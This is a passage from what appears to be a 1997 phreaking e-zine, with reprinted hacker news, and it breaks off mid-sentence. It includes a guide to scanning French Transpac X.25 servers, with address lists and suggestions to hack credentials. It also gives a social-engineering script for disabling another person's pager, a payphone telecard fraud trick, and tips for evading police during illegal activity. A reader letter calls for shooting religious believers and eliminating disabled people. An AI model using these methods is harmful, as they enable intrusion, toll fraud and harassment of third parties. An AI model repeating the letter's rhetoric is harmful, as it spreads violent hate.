http://www.minitel.fr or on www.mctel.fr (VTX plug is the name of that 
program for win95/3.11)

     For Linux, Videotex terminals exist to save videotex pages and for
connecting via modem or telnet (check www.yahoo.com here too..)

3. Some Telnet servers to connect for accessing Transpac nabx25 or nua :#
#########################################################################

     first, you can connect free that MGS nab25 server, which permit you to 
search (like yahoo) any nabx25 server for the domain you want, by connecting 
on port 25 on www.minitel.fr , with the login minitel.. If you want more 
services, with access to a x25 pad, you need to have that damn credit card.. 
or to hack some ID and PASSWD, the security of that server is hum.. not too 
bad, it got totally hacked one time before if i remember, but now it seems 
pretty secure, logs are checked by france telecom guys every days and the 
(new?) root seems to be more intelligent. that "videotex" site can allow you 
to work on it with ansi, so your telnet client will work on it.

     Secondly, strictly videotex, you can connect with VTX-PLUG to 
www.mctel.fr , to those X.25 PADS, first, FREE you can connect the services 
MGS and 3611 (MGS is that search engine for any nabx25 server and 3611 is a 
search engine for any info of any guy in France) (VTX-PLUG connect on port 
516 of www.mctel.fr) or connect services 361x with an ID and PASSWD.. 

     With you damn modem, you can also connect to the 361x services from 
foreign country with a modem videotex terminal (or minitel) to +33 8 36 43 15 
15 for 3615 service, +33 8 36 43 14 14 for 3613 service, or +33 8 36 43 13 13 
for 3613 service. You can connect a good old x.25 pad by calling +33 8 36 06 
44 44 (Transpac one) , for connecting to that old compuserves, can be called 
those ones too +33 8 36 06 96 96 (9600 bauds) or +33 8 36 06 24 24 (2400 
bauds one) .

4. How do we connect servers.. method ?#
########################################

We connect servers with that first number of the nua (1 for france.. the 
others numbers from a 361x service are forbidden.. only connect Transpac or 
Gateways) 1 is France(or 02080 if you connects it from a telenet or another 
network)

after that, we put the 2 numbers of the departement where is located the 
server.. (a departement is like a state in the US.)

. Here is the France Departements list:#
########################################

#####
01  # ain
02  # aisne
03  # allier
04  # alpes hautes provence
05  # hautes alpes
06  # alpes maritimes
07  # ardeche
08  # ardennes
09  # ariege
10  # aube
11  # aude
12  # aveyron
13  # bouches du rhones
14  # calvados
15  # cantal
16  # charente
17  # charente-maritime
18  # cher
19  # correze
20  # corse
21  # cote d'or
22  # cote d'armor
23  # creuse
24  # dordogne
25  # doubs
26  # drome
27  # eure
28  # eure et loir
29  # finistere
30  # gard
31  # haute garonne
32  # gers
33  # gironde
34  # herault
35  # ille et vilaine
36  # indre
37  # indre et loire
38  # isere
39  # jura
40  # landes
41  # loir et cher
42  # loire
43  # haute loire
44  # loire atlantique
45  # loiret
46  # lot
47  # lot et garronne
48  # lozere
49  # maine et loire
50  # manche
51  # marne
52  # haute marne
53  # mayenne
54  # meurthe et moselle
55  # meuse
56  # morbihan
57  # moselle
58  # nievre
59  # nord
60  # oise
61  # orne
62  # pas de calais
63  # puy de dome
64  # pyrenees atlantiques
65  # hautes pyrenees
67  # bas rhin
68  # haut rhin
69  # rhone
70  # haute saone
71  # saone et loire
72  # sarthe
73  # savoie
74  # haute savoie
75  # paris
76  # seine maritime
77  # seine et marne
78  # yvelines
79  # deux sevres
80  # somme
81  # tarn
82  # tarn et garonne
83  # var
84  # vaucluse
85  # vend�e
86  # vienne
87  # haute vienne
88  # vosges
89  # yonne
90  # territoire de belfort
91  # essonne
92  # hauts de seine
93  # seine satin denis
94  # val de marne
95  # val d'oise
#####

After that, the next 6 numbers are the servers numbers.. mostly if you scan, 
you will find servers on 060xxx 021xxx 270xxx 118xxx 190xxx 001xxx 911xxx 
201xxx 010xxx 160xxx, but well remember that you can find servers on any 
xxx000 to xxx999.

For instance, if you need to know the amora x.25 server adress, try to scan 
121xxxxxx (1 is france , 21 is cote d'or, where is located amora company)
if you need to scan for a government or france telecom x.25 server, scan on
175xxxxxx (1 is france and 75 is paris.. where governement is mostly..)
for another Taxes server, try on 167xxxxxx (1 is france and 67 is 
Stransbourg, where is a Taxes server.) Do a random scanning, nua scans are 
illegal and detected in France.

After those numbers, we can (not needed sometimes) 2 nod numbers for 
choosing the service you want to connect in that host.. (on the nabx25, the 
nod have a name too which can be another nabx25 for the same host.) like 
13506031801 is for connecting the restricted service of a french cops/lame 
server.

5. Some nua (0208) for some Transpac Server :#
##############################################

     0208078270383  Teaser Server (Download/Upload mostly, Email access)
     0208078270363  Teaser Server (gives you back you adress and nod argument)
     0208059161009   Some Server
     020806700130244 Taxes Server in VT100 
     
. Note :#
#########

     Yes, you can connect not only Videotex terminal servers, you can connect 
     good old vt100-320 , ansi servers, its why it can be interesting for 
     americans and others to scan it, they could find bank services, telnet 
     gateways (back to internet), compuserves one (bah..) , ...
     
     020807813014614 Cars Selling Server
     020809118070705 Some server
     ...
     
. Some NABX25 :#
################

     telnet Telnet Gateway 
     Teaser Teaser Server (Download/Upload mostly, Email access)
     Impots Financial Server
     CNX    Mail Server
     CHEZ   Mail Server
     AKELA  Some Server
     AAA    Some Ladies/Dudes Server
     
Have fun with that.
memor.

     DIAGO  Chess Playing server


# memor / hbs # memor@stepahead.net

������������������������������������������������������������������������������
�������������������������������������Ŀ
� Beyond HOPE review - by AlienPhreak � 
���������������������������������������

As some of you might of heard Beyond Hope was held in the Big Apple a couple 
weeks ago. I can personally say it sucked. There were only a few occasions 
when I actually enjoyed being there. 

I thought there would be much more hacking and phreaking going on but it 
ended up with the juarez puppy in everyone coming out to take advantage of 
the T1 line Nynex so anonymously supplied. I learned only one thing which was 
(I don't know much about cellular) how to scan and listen in on peoples' 
cellular calls through a motorola flip phone. 

I did enjoy the Bernie S. and Phiber Optik speeches. I'm sure we all know 
about Bernie S, he seemed very intelligent but I think he did have illegal 
possessions (aka Red Box) and in all honesty boxing is outdated and rather 
lame. He certainly wasn't what I'd consider a phone wiz. Still there was no 
reason for him to go to five high security prisons serving time with some big 
black guy named Bubba. Phiber Optik is someone that I actually admire, 
because he knew his shit.

After a while the cDc came on and just ruined everything. What can I say 
about Death Veggie? He's fucking stupid! Also Beyond HOPE was sponsored by 
2600 *coughselloutcough* So I saw some t-shirts going around and them selling 
more of their FREE INFORMATION, but I had to pitch in and buy an "owned" 
shirt. I *might* go to the next HOPE if they keep the cDc out of it and have 
a decent lineup.

������������������������������������������������������������������������������
��������������������������������������Ŀ
� Tatoo pager info and more - by memor � 
����������������������������������������

A little way to call Tatoo pagers easily from French payfones
by memor/hbs memor@mygale.org 
http://www.mygale.org/00/memor


!Remember!
----------

Tatoo is a pager made by France Telecom and Motorola available in France.
it is called via the number 0604xxxxxx
or from a foreign country it is +33 604xxxxxx
ATDT 0604xxxxxx,,,,numberyouwantthepersoncall,,,# can be a way from a
modem to call and send a numeric page
With an operator, u can send alphanumeric messages.
With a "manual" way, u use your phone and call
the 0604xxxxxx, you wait for the recorded voice asking in French
to type the number you want to be called at, you type the number
and after it, type # and Hang Up, the message will be sent. The person
will receive it 10 mins after, time for the slow france telecom 
relays and computers to transmit the numeric message.

!Here is how to invalidate a Tatoo from an annoying dude
(please keystroke, dont do it on me hehe)!

well, you have to phone that number reserved for tatoos users which
is.. 08 36 60 40 20 (+33 8 36 60 40 20 for foreign countries i guess)
ask the operator with your french voice to,
"je suis le tatoo numero 08 06 xx xx, quelle est ma zone de reception"
you will ask the operator where does the pager receive messages
she will answer a "district" like paris, or south of france, or another
thing..  and tell her after that "je demenage en zone <autre zone>"
you will tell the operator to change the district to another one,
so the pager wont receive message after that.. and the annoying person
wont be contacted again.. 

now, something about French payfones..
you use a "telecarte" or telecard with fone money utilities..
1 unit = 0.73 ff

its a normal telecard



the payfone works like that with the telecard..

you dial the fone number you want to call
the payfone checks if you called a free fone number or a number you have to 
pay for; if its a free fone number, it continues without checking if a card 
is in the payfone.


the payfone will verify that a telecard is in the payfone
if not.. it will disconnect you and beep
if yes:
you connect to the number
<a delay>
the payfones send the signal to kill a unit in the telecard
<a delay>
payfone waits the telecard send the signal that the unit got killed
if signal received.., continue conversation at phone
if signal lost.., disconnect the phone conversation
if signal that telecard is empty.., �see if signal lost

well.. during those delays you have time to put a little paper
between the telecard and the payfone reader/writer like this:

                 /�reader/writer of the payfone
---------***\/***----------
-------------------------------------< paper
---------********- <- telecard with *** chip

and so you will have 5 seconds (the delay) to type the number you want the 
person to call you back and '#' before the payfone see that there is no card 
and hang up on you.. but well that service costs like 1$us for a numeric
message so it can be interesting not having to pay for it :)

memor.

������������������������������������������������������������������������������
��������������������������������������������������Ŀ
� Help-a-phreak, come to us when you're desperate! � 
����������������������������������������������������

The problem is this: a phreak named moloch tried using 800-487-9240 to do an 
ani.  The number returned a recorded message stating "ARU ID is echo-7-
alpha". Two other messages could also be heard when dialing this number, 
"caller interactive is 9900" and "line number is 0". What do these messages 
mean? It's the question the telcos can't even answer... after conversations 
with Bell Atlantic, Lucent Technologies, AT&T, MCI, and his local telco, 
moloch has yet to find the answer he's looking for. He's been told by the 
local branches that it's a network code, and the larger telcos say it's a 
trunk issue. He's gotten the same messages when attempting an ani from 
payphones, regular phones, and on the wm.edu digital phone network. He's 
tried special services, network services, hardware services, residential 
services, long distance services, general tech support, and trunk support, 
but to no avail. Have any of you, the readers, heard any messages like these? 
Do you know what these messages mean? If so, let us know, or you can answer 
to moloch yourself, at craqhore@multic.ml.org

Help your fellow phreak in his time of need! You'll feel better about 
yourself, even if you think you're still a loser!

������������������������������������������������������������������������������
Oh No! It's that time again - it's....
����������������������������������������������Ŀ
� Oddville, THTJ - compiled & edited by Scud-O � 
� Letters from a place far freakier than LA    �
������������������������������������������������

---

X-Sender: f0k
X-Mailer: Windows Eudora Light Version 3.0.1 (32)
Date: Wed, 07 May 1997 22:15:10 -0500
To: sin@hyper-media.net
From: f0k of the Night 
Subject: hi

hello everyone.  Id be f0k. (no, Im not black, but I felt the need to refer
to myself in third person, using the word 'be') I will list to you some of
my beliefs, so if/when we ever talk, you'll know alittle about me.

1) I feel any and all information should be free.
2) I believe anyone who stands in the way of my gathering of information
 is a communist/socialist pig.  These types of ppl should be shot on
 sight.
3) I dont believe in the devil... or god.
4) I think anyone who believes in god is weak, selfish and inferior
5) I know Im right, always (unless I change my mind, inwhich case...
 I get to be right some more =])
6) I believe in Zero Tolerance politics.  If you fuck up, you die. If you
 cant provide for yourself you die.  Let the
weak/uninspired/lazy/retarded/handicaped filter themselves out.  It works
 for many other species.
7) I believe 2600 to be a Commercial 'wh0re' of sorts.
8) I believe Bill Clinton is imbred, there for inferior geneticly and should
 be eliminated.  As to avoid Another little Chelsea Clinton
9) I believe if your still reading this, your one sick mother fucker =]
10) I believe I have all the answers and if you follow me you will reach
 a higher state of awareness and enlightment.  I also charge 20 bux an hour
 for group therapy.
11) I think Jews, Christians, and all other ppl "of faith" should be
coralled  up in a cage and shot.  You are weak.  Your religions are all
relics.  You
 are the enemy to the Technological Era.  Im an equal rights discriminator.
 I dont care what religion you are, unless you are a f0kist and follow
f0kism,   you are weak.

pretty pimpy eh?  There, thats me in a bottle.  Spray it on yerself to
attract all the fellas.  Tell your friends and your neighbors.  w00h00

-f0k-
.aS$$$$$$$$$$$$$$Sa.
$'   ,   `$P'  ,  `S$    $    $$
$    $    $    P    $    $    $$
$    $ssss$    H    $       .s$$
$         $    E    $    a    $$
$    $$$    E    $    $    $$
$s.  $$$.   R   .$s.  $    $$
`Q$$s$$$$sssss$$$s$$$P'

  [ The f0k manifesto - know it well, roflol ]

---
{Several spelling errors have been corrected in the following email}
Date: Wed, 6 Aug 1997 02:41:05 -0400 (EDT)
X-Sender: phraud@mail.interlog.com
X-Mailer: Windows Eudora Light Version 1.5.4 (16)
To: scud@thtj.com
From: REBEL LOGiC <phraud@interlog.com>
Subject: Article

Greets,

I have an article you might consider worth publishing. Here ya go:

                                                      PARANOIA
                                                      ~~~~~~~~~

By: Rebel Logik

For those of you that are not naturally "paranoid" you have my sympathies.
But, buy reading this file you can improve your caution, senses, and
down-right insecurity. 

1. Wear dark clothing: Blues, Blacks etc. etc. Also wear things that hide
your face, hoods, hats etc.

2. Always, always look around you for unwanted types (FEDS, Cops, RCMP, CIA,
NSA) who can usually be pinpointed by wearing a certain type of clothing.
Usually suits, sunglasses, basically just MIB's. These foul beings can
reside anywhere. Your school, your alley, family gatherings (it could easily
be the ones you love most that do you in!", party's and other social places.

3. Always be privy to local escape routes. Such as fireescapes, backdoors
etc. These are handy when encountered with a bust.

4. If you happen to see any law enforcement vechicles or telco vehicles in
your neighborhood cease all illegal activity for a number of days until THEY
are gone.

5. Encrypt your Hard-Drive using some encryption utility. Also, (although
easily cracked) put windows passwords on everything. After a large "project"
burn or destroy excess paper with information.

6. Always Op-Divert, and call from payphones when dialing illegally setup
teleconferences. Be aware that OCI has an ANI!

7. If you think you are being tapped, and cannot be bothered to go to a
payphone: Always talk about bullshit first while discussing an illegal
activity. After 2 or so minutes  of talking about lunch, family members,
cars etc. They will be forced to hang up and stop the tap. This is called
the "transmission" law. If after a certain amount of time (2-5 minutes)if
they still cannot hear you discussing anything of illegal nature they are
FORCED by LAW to quit listening in.

8. Stay away from drugs while doing important things or you'll fuck them up!
Drugs are okay if you want to lie on your coach eating pizza. That's all!
Try to IPSPOOF while stoned and the FEDS are at your door 5 minutes later!

9. When beige boxing or doing anything else that's illegal and phone
related: Always do it at night and in a secluded area. I know this sounds
like common sense but some phreaks.......

Well, I hope you enjoyed this file!
And remember.....

"Even paranoids have real enemies"-Delmore Schwartz

Well, there it is. Respons with yer response. err....

Later,
Rebel_Logik

---

From: evilchic@nwlink.com
To: "'sin@hyper-media.net'" <sin@hyper-media.net>
Subject: FW: i want to be a sinner yeah i want to be a sinner
Date: Wed, 6 Aug 1997 13:34:19 -0700

Why the fuck is it that I get all these lame ass emails that make no sense???

Suz


-----Original Message-----
From:     b c m [SMTP:sandworm666@juno.com]
Sent:     Tuesday, August 05, 1997 12:49 PM
To:  webmistress@sinnerz.com
Subject:  i want to be a sinner yeah i want to be a sinner

sin sin sin sin sin sin sin sin sin sin sin sin sin sin
                i want to sin
sin sin sin sin sin sin sin sin sin sin sin sin sin sin

i am kewl i am, they accepted me into those kool aol lamerz clubz
yeah right i wouldnt join one of those stupid ass things

I HATE MOST AOLERS THEY THINK THEY KNOW EVERYTHING
Trying to TOS my ass well they can fuck themselves with there 
stupid ASCII Art or IM bombs well fuck em stupid lame ass pussys
i was doing that shit when i was 9. Yeah they were so fuckin cool.
Stupid asses threating people on AOL when they cant even fuckiin
carry it out.   FUCK THEM they want to fuckin attack all the bitches on 
AOL
they got to get into AOL setup and fuckin use the nickname that IM's the 
whole network and fuckin IM bomb everyone on the network.  They want to
use a fuckin virus they got to break into setup and change the interface
arround
when you get art updates they got to switch the art with a virus but they
are stupid.

 [ ROFLOL! god do we get some stupid e-mail! ] 

---

From: Elit3Cr4sh@aol.com
Date: Thu, 7 Aug 1997 17:21:24 -0400 (EDT)
To: scud@thtj.com
Subject: thtj

is there a print issue of this? if so where can i get it

 [ no, but if you send me about 25$ ill print you up a copy.... ]  

---

Date: Tue, 12 Aug 1997 03:14:40 -0400
From: SUSAN BURTON <sburton@idt.net>
Reply-To: sburton@idt.net
Organization: POOL DISTRIBUTORS,INC.
X-Mailer: Mozilla 3.01C-IDT-v5  (Win95; U)
To: scud@thtj.com
Subject: CELLULAR ACTIVATION??????????????????????????????

hey do you think you can help me?ive been looking for the equipment or
hardware to activate a cellular from a home pc.now i know its out there
and i know its illegal but i cant find where to order this stuff or how
much it is,do you think you can look in to this for and find where and
how much the hardware is,and if possible can you find me a file on how
to activate cellular phones from a home pc thanks i would really
appreciate it,please right back    SHADOW

  [ look, i dont have time to do your research. do it yourself!   use the 
    search engines out there, look with your own eyes! ]

---

Date: Wed, 13 Aug 1997 00:59:35 -0500
From: Clint Rogers <tennis@linknet.net>
Reply-To: tennis@linknet.net
X-Mailer: Mozilla 3.0Gold (Win95; I)
To: scud@thtj.com
Subject: suggestion

Beeper and pager hacking im looking into that or phreaking a pager??

Clint

   [  memor has covered a bunch of things with pagers before, and what
      the fuck do you mean by 'phreaking' a pager? ] 

---

rom: Jungle1416@aol.com
Date: Tue, 19 Aug 1997 14:31:47 -0400 (EDT)
To: thtj@thtj.com
Subject: information

Hi I really like your new site, and I was wondering if there are catalogs I
can order because I'm really interested in hacking.  Thanks!

  [ wtf? if you want hacking info, just search on the internet, there are 
    no catalogs out there.... ]

---

oh yea, and to the 50 or so people who send me a little message from ICQ
about getting ICQ, look im not getting it, nor am i planing to. Im to busy
as it is to bother with that.

������������������������������������������������������������������������������
                                
                                --------------   
                               --=[The News]=--
                        Compiled & edited by KungFuFox
                                --------------

     1 : Hackers pay Apple its due 
     2 : Hackers Frolic in the Woods
     3 : `Spam' foes tie up Usenet     
     4 : Netly News - HOPE On A Rope 
     5 : Bell Atlantic-Nynex Merger Gets Final OK   
     6 : Getting Ready For Internet2   
     7 : AOL urges its members to protect themselves    
         
          "It has always been fun." -Brandon Tartikoff

������������������������������������������������������������� 
 Hackers pay Apple its due 
 August 4, 1997  
 BY CHRIS NOLAN
 
 Talk Is Cheap  

 WHEN it comes to Apple, even thieves get sentimental. Some of those who know 
 the company best -- computer hackers -- are urging one another not to 
 download free copies of the company's latest operating system, Mac OS 8. 
 Instead, they say, Apple supporters should pay money for the operating 
 system. [Is it just me, or is this stupid reporter calling warez kiddies
 "computer hackers"? Can't these people tell the fucking difference?]

"I've seen behavior in the pirate community which is alien to say the least," 
writes one "bewildered superuser" in a discussion posted on MacInTouch Reader 
Reports, a Web site for Macintosh supporters and users. "As I looked and 
looked I found not one (illegal) copy of OS 8 GM available anywhere."

Hackers [there it is again] usually pride themselves on their ability to get 
good, new software for free. The faster the hack, the better their ability to 
manipulate computer code and get products or information companies are 
anxious to protect. So, this sudden outbreak of belated good citizenship is, 
well, surprising. It's kind of touching, too.

"I have always fully intended to purchase the new OS even though I could have 
it for free just by waiting until we install it at my company and STEAL it 
then," another Mac user wrote in mid-July, just as talk of former CEO Gil 
Amelio's resignation began. "Apple needs every penny, every sale they can 
cobble together right now."

Writes another MacInTouch reader, one who seems to speak with a bit more 
hacking authority: "Absolutely NO copies of Mac OS 8.0 Golden Master have 
been circulating. This is in contrast to 30-40 sites for download Mac OS 
7.6cd image in the past. This is EXTREMELY good for Apple and I do support 
this movement by some people in the computer underground that have found a 
good conscience." [At least this guy used the term "computer underground"]

�1997 San Jose Mercury News
�������������������������������������������������������������
 
 Hackers Frolic in the Woods
 by Mike Tanner 

 6:13pm 8.Aug.97.PDT -- One of the first things participants see upon 
 arriving at HIP 97 - a gathering this weekend of 2,500 members of the 
 international hacking community at a campground about 30 minutes from 
 Amsterdam - is a gravestone engraved with Bill Gates' name and the epitaph 
 "Where do you want to go today?" 

"All the hackers just go crazy when they see that," event coordinator Maurice 
Wessling says of this goad to the fest's resolutely anti-authoritarian 
participants. The marker also serves, however - along with the event's 
willfully obscure location - to increase the sense of the site as underground 
and removed from the routine world. "We are trying to disconnect people from 
their daily whereabouts," Wessling says, "to force them to take a different 
approach to reality." 

HIP - the name stands for Hacking in Progress, a follow-up of sorts to 1993's 
Hacking at the End of the Universe convocation - is a kind of politicized 
Burning Man for hackers, tent-cities and all-night parties included. Its 
technopaganism is skewed pretty far toward the techno side, though. HIP is a 
gathering, says an amused Wessling, where "you'll see these very small 
igloo-like tents with 17-inch monitors in them." 

And unlike the pointed pointlessness of Burning Man, HIP hopes to address 
concrete issues that affect the lives of the participants, such as Internet 
censorship, spam, and, of course, cryptography. Spamming may seem off the 
subject for a group dedicated to abrogating the rules of the Internet, but 
Wessling explains that its proliferation threatens to make the Net unusable, 
while measures to prevent it may lead to censorship. "The essence of HIP is 
that the technical aspect and the political aspect are two sides of the same 
coin," he says. 

This is not to say that elements of hacking's criminal background won't be 
evident at the gathering. There is a tent of German participants present to 
discuss the building of a brute-force DES cracking machine, and a 
presentation Saturday by another German group that recently made headlines 
for exploiting ActiveX security holes to intercept home-banking software. 
Still another demonstration will show how radiation from text on a computer 
screen can be picked up by an antenna and then displayed on another machine. 

But HIP is mainly about how these techniques, and the laws and technologies 
used to address them, will affect the freedom and utility of the online world 
- about how the protocols developed and exposed by hackers now, says 
Wessling, "will be used against us later." 

This direction isn't surprising, considering that HIP administrator Wessling 
is a former writer for a grassroots publisher of books on police and 
intelligence issues. It's also a reflection of the fact that the hacker class 
went from being a bane of the network system to becoming its architects. 
Wessling's salary, in fact, is paid by XS4All, a high-profile Dutch ISP 
itself founded by a group of former hackers. 

Although many hackers have gone corporate, says Wessling, "We still feel the 
urge to do crazy things like this." 

The event's geographical and psychological disconnection is in stark contrast 
to HIP's strikingly powerful electronic connections to the outside world, 
which consist of a microwave beam IP connection to the campground and a 
glass-fiber network connecting 600 participants' computers and growing. 

Organizers have also secured extra transatlantic bandwidth for the event. 
Aside from allowing homebound hackers to be involved in the gathering through 
audio and video feeds to HIP's Web site, it also allows the fest to be 
closely coordinated with the simultaneous Beyond HOPE hackers' conference in 
New York. In fact, HIP was officially opened Friday morning via video link 
from the HOPE site by 2600 magazine editor Emmanuel Goldstein. 

These being hackers, however, all that networking muscle is also being used 
for such things as a long-distance switch to turn a red light at each 
convention location on and off from across the ocean. On a slightly more 
useful front, 10 HIPsters are now working their PCs 24 hours a day building 
what was a small text site into the real-time multimedia hub. "If they do 
something wrong in the coding," says Wessling, "they instantly get three 
emails from all over the world. It's a completely new way of error-checking." 

That the connections work at all is impressive. Richard Thieme, a writer and 
frequent speaker at hacker conventions, points out that at this year's 
version of the venerable DEFCon, organizers were unable to get their T1 
connection to work. Though they stake their reputations on their ability to 
manipulate network technology, says Thieme, hackers are really playing 
catch-up with corporations, which conduct complex video conferences as a 
matter of routine. "These are not professional meeting-planners," he says. 

Whether such get-togethers work with the groups' natural skills, though, 
Wessling believes they are worth the effort: "This is very important, because 
it is one of the rare opportunities for these people to really get together." 

For participant Alfred Heitink, who's using his trip to HIP partly as an 
opportunity to establish an online adoptee network, "It is strange to talk at 
a camping site with people at 7 o'clock about PGP.... That's what makes this 
place so special." 
 
�1993-97 Wired Ventures, Inc.
�������������������������������������������������������������
 
 `Spam' foes tie up Usenet   
 Tuesday, August 5, 1997  
 BY DAVID L. WILSON

 In the old West, Committees of Vigilance arose when there was no legitimate 
 legal authority, enforcing local mores, sometimes with the aid of a noose. 
 Now, electronic vigilantes have leaped into action on the modern-day 
 frontier, the Internet, squelching the ability of hundreds of thousands of 
 people to get their word out on global bulletin boards.

Since Friday evening, a group of computer system administrators has been 
striking back against "spammers" by blocking Usenet messages sent from a 
major Internet service provider. As a result, the vast majority of people who 
rely on UUNET Technologies Inc., one of the largest Internet service 
providers, have been unable since Friday to post messages to Usenet, a kind 
of electronic bulletin board accessible through the Internet. Tens of 
thousands of messages have been blocked by the protest, which continued 
Monday night. 

Usenet is made up of thousands of "newsgroups," each dedicated to a specific 
topic, from Star Trek to mystery novels to the music of Beethoven. Accepted 
practice is that any message posted to a newsgroup must be germane to the 
group. Some people ignore the unwritten etiquette of Usenet, however, and 
post the same message -- usually an advertisement -- in as many newsgroups as 
they can, a process called "spamming." It was not known how many of the 
blocked messages were such ads. 

In recent years, vigilantes have sprung up who cancel such spams on an 
individual basis. This latest incident is unusual, however, because it is 
aimed not at the messages themselves, but at the Internet provider that gives 
the spammers access to Usenet. The action, believed to be by far the most 
far-reaching of its kind in the Internet's history, does not affect the 
ability of UUNET subscribers to send and receive individual e-mail messages 
or use the World Wide Web.

Non-spam blocked, too

 Even so, the scope and indiscriminate nature of the blockage rattled the 
 Internet community. "I'm very much in sympathy because spam really has 
 become an enormous problem, but not all the messages they're blocking are 
 spam," said Mike Godwin, legal counsel for the Electronic Freedom 
 Foundation in San Francisco, which lobbies for free speech on the Net. 
 "This is like dropping a nuclear bomb on a town because you know there's a 
 terrorist living there."

A communique, apparently from the unnamed systems administrators' group 
behind the blockade, was posted on Usenet. It says several people are 
involved in the action against UUNET, and that the action was taken because 
in recent weeks one-third to one-half of Usenet spam has originated with 
UUNET. The communique says the huge volume of spam threatens to destroy the 
network, and that the action was taken only because the company has ignored 
repeated requests from administrators around the world to do something about 
the spam problem. System administrators are persons who oversee computers 
that route messages on the Usenet system.

Officials with UUNET, based in Fairfax, Va., said they would not comment 
until today, however the company's chief executive, John Sidgemore, told the 
Washington Post, "These people are not government agents or the police. They 
have absolutely no right to cancel service on someone else's infrastructure."

 An employee of the company who agreed to comment on condition of anonymity, 
 said, "I can assure you that this company will use every legal means at its 
 disposal to deal with it."

UUNET provides Internet access to about 50,000 subscribers, but not 
individual users, only other Internet service providers. The number of people 
dependent upon UUNET is unknown but could be in the millions.

Individual users would bump into the blockade if their local Internet service 
provider purchases Usenet access through UUNET. Users may not even know that 
their postings are being blocked.

Vowing to continue

 The individuals who helped develop the blockade say they had no choice. "We 
 are convinced this action was necessary to save the Net," said Dennis 
 McClain-Furmanski, a student at Radford University in Radford, Va., who is 
 acting as a spokesman for the group, which numbers about 20. The group has 
 vowed to continue the action until UUNET takes some kind of action to 
 minimize the spam it sends out into Usenet.

While spams have existed almost as long as Usenet, their numbers have 
increased vastly in the last year. And spammers have become sneakier, forging 
fake return addresses, and even forging permission to appear in a "moderated" 
news group, where theoretically only messages approved by a human moderator 
appear.

The vigilantes who are deleting the Usenet contributions are using -- or 
misusing -- a "cancel" feature built into the underlying software on which 
Usenet is based. Theoretically, only the person who posted an article on 
Usenet can issue a cancel command for it.

Once issued, a cancel message races through the computers connected to the 
system around the world, erasing the article. Cancel messages are 
legitimately used by authors who have made a mistake or wish to withdraw an 
article for some other reason.

Because there are no widespread authentication schemes in use on the 
Internet, it is fairly easy to forge a sender's address, however. And there 
are computer programs known as "cancelbots" that can be ordered to forge 
cancel messages against a spam and erase it throughout Usenet. The vigilantes 
use such cancelbots to eliminate spam whenever they spot it.

 Local system administrators can thwart such tactics by disabling the cancel 
 feature on their systems. Therefore, the vigilantes argue, their cancel 
 messages are mere "advisories."

There have long been people who forge cancel messages, and even some 
legendary ``cancel wars'' between people who have attempted to shut each 
other up. But never before have so many users been cut off.

"In military terms, this is acceptable collateral damage," said 
McClain-Furmanski. The amount of Usenet spam coming out of UUNET connections 
was so vast that it could no longer be dealt with by programming the 
cancelbots to eliminate individual messages, he said, so they were programmed 
to eliminate anything that came out of UUNET.

Sean Eric Fagan of San Jose has owned a Usenet site for more than eight 
years. He is not directly participating in the blockade, but is supporting 
the participants. "I moderate the newsgroup comp.std.unix, which gets almost 
nothing but spam these days," he said.

Fagan says everyone involved in the situation understands the danger that the 
power being wielded could be misused. "There's a hazard any time you've got 
somebody trying to enforce standards," he said, "but these people are not 
vigilantes."

Others disagree, however. Godwin said, "Unless they've been deputized, then 
this is vigilante action."

�1997 San Jose Mercury News 
�������������������������������������������������������������
 
 Netly News - HOPE On A Rope 

 Nothing makes hackers happier than breaking into a computer that another 
 hacker set up, especially when an appreciative audience is watching. Small 
 surprise, then, that there were plenty of grins at last weekend's Beyond 
 HOPE hacker convention in New York City.  

The first break-in attempt came at about 4 a.m. on Friday when a huge, 
tattoo-encrusted Englishman named Cyberjunkie ran a utility that probed the 
network of HOPE's Dutch sister conference, Hacking In Progress. The plan: to 
expose any weaknesses, then peel away the security measures of the target 
computer like the layers of an onion. The program quickly found several 
obvious security holes. "So I had to do something," Cyberjunkie says. "It's a 
bit like waving a red flag at a bull, isn't it?" Like the encierro at 
Pamplona, Cyberjunkie sent a stampede of null information into one of the 
server's memory buffers until it choked and overloaded. Quietly attached at 
the end was a simple script that granted him the access he wanted. (In hacker 
argot, this is known as an IMAP exploit.)  

Because hacking is not only encouraged but rewarded at HOPE -- which 
conference organizer Emmannuel Goldstein revived this summer after a 
three-year hiatus -- each of the thousands of participants received an IP 
address with which they could glom onto the Puck Building's 10-megabit 
network and connect to the rest of the world. The Pittsburgh-based DataHaven 
Project provided 15 public terminals, but Ethernet hub plugins were 
plentiful. Confused? No problem. The 13-year-old with braces in the next 
chair was glad to help out. After all, he'd already hooked his ancient DEC, 
Hewlett-Packard or portable IBM onto the Net and was busily trying to gain 
root access.  

When you'd tired of chatting on IRC #hope (topic at 4:11 p.m. on Saturday: 
"HOPE is a commercial enterprise full of bull"), you could browse through the 
various kinds of phone equipment, T-shirts or software that were on sale. 
Ether Bunny sold $250 worth of lineman's equipment (including several 
Southwestern Bell hard hats) in just over an hour. There was, of course, a 
constant stream of panels to attend: Tiger Teaming (better known as security 
consulting); cryptography; how to hack Windows NT; Metrocard hacking; a 
prisoner panel that included Bernie S. and Phiber Optik; and an amazing talk 
on privacy given by investigator Steve Rambam.      

Best known for tracking down 161 Nazi war criminals hiding in Canada, Rambam 
is a consummate connoisseur of databases. "It is true that I can go online 
and reliably determine if you are a homosexual or a lesbian. It is true that 
I can go online and determine your religion. I can go online and, without 
breaking a sweat or getting carpal tunnel syndrome, find what movies you rent 
at Blockbuster," he said.  

Yet Rambam takes an unlikely stance on the privacy issue, especially in a 
room full of paranoids. Closing off databases, he says, will not adversely 
affect his work -- since he'll always be able to buy the information from 
someplace. "It will harm the ability of the average person to control their 
lives; to check up on government to see if they are lying to him, to check up 
on big business to see if they are lying to him, to check up on the guy next 
door and see if he is an ax murderer," he said.  

Now Rambam may be biased, for he operates a billion-record database that is 
accessible online to subscribers (he refused to give the URL for fear of 
hacking attacks). Nevertheless, it was rare to see so many teenagers taking 
copious notes, noted fellow attendee Shabbir Safdar. The audience couldn't 
get enough of Rambam, who looked more like a fed than a hacker in his 
custom-made Hong Kong suit. (A big hit was when he detailed how to turn a 
dead man's identity into your own.) But ultimately, Rambam questioned why 
anyone would want to: "The fact of the matter is that there is no real reason 
to hide most of who you are and what you do."  

It's an unfortunate but true statement about the state of hacking today. 
Where have all the good hacks gone? Three years later and the flimsy 
Metrocard is still impenetrable. A panel of hackers turned security 
consultants showed that one of the biggest challenges for today's data 
cowboys was changing the preconceived notions of hackers held by the 
corporations they work for.  

Keynote speaker Brock Meeks, went so far as to admonish the crowd for their 
